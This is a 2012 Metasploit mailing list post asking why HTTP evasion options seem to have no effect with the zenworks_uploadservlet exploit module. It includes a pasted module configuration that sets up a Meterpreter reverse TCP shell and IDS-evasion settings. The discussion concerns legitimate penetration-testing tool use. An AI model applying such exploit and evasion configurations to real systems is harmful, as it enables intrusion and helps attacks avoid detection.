Metasploit mailing list archives
HTTP Evasions not working as intended
From: Ashish Joshi <joshi.ashish22 () gmail com>
Date: Fri, 6 Jan 2012 15:41:29 +0530
Hi, I am trying to use various HTTP evasions for some HTTP server based exploits (say exploit/windows/http/zenworks_uploadservlet) or similar exploits. I am making use of various evasions supported. However, when I run the exploit , I don’t see any difference b/w a normal exploitation and evasive exploitation. I checked respective pcaps and they all look same. I have tried using following evasions: HTTP::method_random_case HTTP::uri_fake_end HTTP::pad_fake_headers .. and couple more. Here is my config: msf exploit(zenworks_uploadservlet) > set Global ====== No entries in data store. Module: windows/http/zenworks_uploadservlet =========================================== Name Value ---- ----- EnableUnicodeEncoding true FingerprintCheck false HTTP::header_folding false HTTP::method_random_case true HTTP::method_random_invalid false HTTP::method_random_valid false HTTP::pad_fake_headers false HTTP::pad_fake_headers_count 0 HTTP::pad_get_params false HTTP::pad_get_params_count 16 HTTP::pad_method_uri_count 1 HTTP::pad_method_uri_type space HTTP::pad_post_params false HTTP::pad_post_params_count 16 HTTP::pad_uri_version_count 1 HTTP::pad_uri_version_type space HTTP::uri_dir_fake_relative false HTTP::uri_dir_self_reference false HTTP::uri_encode_mode hex-normal HTTP::uri_fake_end true HTTP::uri_fake_params_start false HTTP::uri_full_url false HTTP::uri_use_backslashes false InitialAutoRunScript LHOST 10.204.136.1 LPORT 4444 PAYLOAD java/meterpreter/reverse_tcp RHOST 8.0.0.101 RPORT 80 TARGET 0 UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) VERBOSE false WfsDelay 0 This doesn’t seems to be working. Is there any bug related to it. I checked the bug-tracker and couldn’t find a relevant one. How do I make it work. Any help would be appreciated. Thanks, Ashish
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- HTTP Evasions not working as intended Ashish Joshi (Jan 06)
- Re: HTTP Evasions not working as intended egypt (Jan 06)
- Re: HTTP Evasions not working as intended HD Moore (Jan 07)